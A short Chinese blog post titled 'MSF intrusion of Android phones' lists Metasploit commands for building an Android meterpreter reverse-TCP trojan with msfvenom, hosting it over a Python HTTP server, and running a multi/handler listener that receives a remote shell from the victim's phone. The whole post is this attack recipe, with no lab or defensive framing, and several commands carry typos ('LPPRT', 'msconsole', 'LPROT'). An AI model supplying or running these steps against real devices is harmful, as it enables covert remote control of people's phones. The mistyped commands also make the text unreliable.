MSF 入侵安卓手机

  • 生成木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.135.247 LPPRT=5555
  • 进行文件传输: python3 -m http.server
  • 启动 MSF 控制端 : msconsole
  • 设置模块: use exploit/multi/handler
  • 设置payload: set payload android/meterpreter/reverse_tcp
  • 查看配置: show options
  • 设定监听地址: set LHOST 192.168.135.247
  • 设定端口:set LPROT 5555
  • 运行: exploit
posted @ 2024-10-09 19:30  ZapcoMan  阅读(21)  评论(0编辑  收藏  举报